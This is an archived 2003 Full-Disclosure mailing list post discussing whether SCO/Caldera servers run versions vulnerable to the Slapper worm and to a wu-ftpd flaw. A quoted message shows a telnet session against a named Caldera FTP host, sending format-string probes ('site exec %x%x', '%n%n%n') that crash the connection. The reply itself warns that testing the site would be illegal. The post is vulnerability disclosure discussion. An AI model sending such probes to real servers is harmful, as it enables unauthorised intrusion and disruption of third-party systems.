| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: dcopley at eeye.com (Drew Copley) Subject: SCO Web Site Vulnerable to Slapper? > -----Original Message----- > From: full-disclosure-admin@...ts.netsys.com > [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of KF > Sent: Tuesday, August 19, 2003 9:21 AM > To: Jeremiah Cornelius > Cc: Gherkin McDonalds; full-disclosure@...ts.netsys.com; > security@...dera.com; security@....com > Subject: Re: [Full-Disclosure] SCO Web Site Vulnerable to Slapper? > > > **** CALERA ARE YOU PAYING ATTENTION **** WAKE UP **** > > (normally I would not do this...) I am under the impression > that either > they probably don't care about their secuirty or they are > ignorant... I > reported this (see below) to them SEVERAL times... they use a > vulnerable > version of their own ftpd on their ftp server... can you say trojaned > distribution site? They probably have not patched it because > no one has > produced a public exploit... they DO have a patch available however. > > > telnet ftpput.caldera.com 21 > > Trying 216.250.128.33... > > Connected to ftpput.caldera.com. > > Escape character is '^]'. > > 220 artemis FTP server (Version 2.1WU(1)) ready. > > user anonymous > > 331 Guest login ok, send e-mail address as password. > > pass err@ > > 230-Welcome to Caldera's FTP Archive Site > > 230- > ... > > 230 Guest login ok, access restrictions apply. > > site exec %x%x > > 200-d2 > > 200 (end of '%x%x') > > site exec %n%n%n > > Connection closed by foreign host. > > > -KF > > > ------------------------------------------------- > subject: [Full-Disclosure] SCO Web Site Vulnerable to > Slapper? integerdotonefourfivenine@...oo.com wrote: > > They seem to be running Apache/1.3.14 (Unix) > mod_ssl/2.7.1 OpenSSL/0.9.6 PHP/4.3.2-RC on Linux, > which, if I have my facts straight, is vulnerable to > <URL:http://www.cert.org/advisories/CA-2002-27.html>. > > Am I correct? Unfortunately, the version number reported is not always accurate. Very often [or too often] admins will recompile customized fixes of their software and not bother with upgrading the version number. Some have even recommended this kind of tactic as a security measure, to throw people off. However, it makes remote checking - automated checking - of systems by administrators more difficult, and depending on the issue, potentially impossible. With plain text protocols it can be extremely difficult to ascertain whether or not they have a fix for a security issue unless they have upgraded their version number or one is willing to crash one's server with a live test. With binary protocols and major upgrades there tends to be more of a chance that one can do a non-intrusive check that does not require a crash and does not require version numbers. This said, it would be illegal to actually test their site, so let them handle the hassle. It is unprofessional and rude of them not to respond about this concern, but that and telling people is all you can do. > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html >
Powered by blists - more mailing lists